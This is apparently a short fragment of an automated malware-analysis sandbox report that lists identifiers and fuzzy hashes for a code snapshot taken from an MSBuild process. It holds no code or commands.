                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PG$PG$PG$;r^
                                                                                                                • API String ID: 0-876817749
                                                                                                                • Opcode ID: be5bf579002b1d8f492a733e3081fa5aa19f148503839a62054245d6a772f2fc
                                                                                                                • Instruction ID: ef2e19b0bb5ac17a9e0bb210aeba5f57b5a0975e1ce955d74622c7eb07825cda
                                                                                                                • Opcode Fuzzy Hash: be5bf579002b1d8f492a733e3081fa5aa19f148503839a62054245d6a772f2fc
                                                                                                                • Instruction Fuzzy Hash: 92217C74E04259AFCB05EFB9E4557AEBBB2FB86300F1084A9D024AB395CB385A05DF41